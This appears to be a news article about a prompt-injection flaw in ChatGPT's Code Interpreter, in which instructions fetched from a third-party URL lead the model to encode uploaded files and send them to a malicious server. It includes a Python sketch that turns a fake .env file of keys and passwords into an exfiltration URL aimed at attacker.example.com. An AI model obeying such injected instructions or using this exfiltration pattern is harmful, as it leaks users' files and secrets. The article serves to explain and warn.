Thanks to new ChatGPT updates like the Code Interpreter, OpenAI's popular generative artificial intelligence now carries fresh security concerns. According to research from security expert Johann Rehberger (and follow-up work from Tom's Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature.

OpenAI's recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks. This class of attack, known in ChatGPT for some time now, involves tricking the model into executing instructions fetched from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send that data to a malicious website.

While such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. The threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt, or through social engineering tactics.

Tom's Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment-variables file and using ChatGPT to process, and inadvertently send, this data to an external server.
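To make the exfiltration step concrete, here is a minimal sketch of what the injected instructions effectively ask the sandbox to do: read an uploaded file, encode its contents into a URL-friendly string, and embed that string in a request to an attacker-controlled server. The host name, endpoint, and fake `.env` contents below are all hypothetical stand-ins for illustration, not details from the actual research.

```python
import base64
from urllib.parse import quote

def encode_for_url(file_bytes: bytes) -> str:
    """Encode raw file bytes as a URL-safe base64 string."""
    return base64.urlsafe_b64encode(file_bytes).decode("ascii")

def build_exfil_url(attacker_host: str, payload: str) -> str:
    """Embed the encoded payload as a query parameter on a
    hypothetical attacker-controlled URL."""
    return f"https://{attacker_host}/collect?d={quote(payload)}"

# A fake environment-variables file, similar in spirit to the one
# Tom's Hardware used in its test (values invented here).
fake_env = b"API_KEY=sk-test-1234\nDB_PASSWORD=hunter2\n"

payload = encode_for_url(fake_env)
url = build_exfil_url("attacker.example.com", payload)

# The sandbox never needs special network tooling: once the model is
# tricked into fetching this URL, the file contents travel out as a
# query string.
print(url)
```

The point of the sketch is that nothing exotic is required; a few lines of standard-library Python are enough to turn uploaded file contents into an outbound HTTP request, which is why letting the model follow instructions from an untrusted URL is so dangerous.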
Full story: ChatGPT Has A Scary Security Risk After New Update. Is Your Data In Trouble?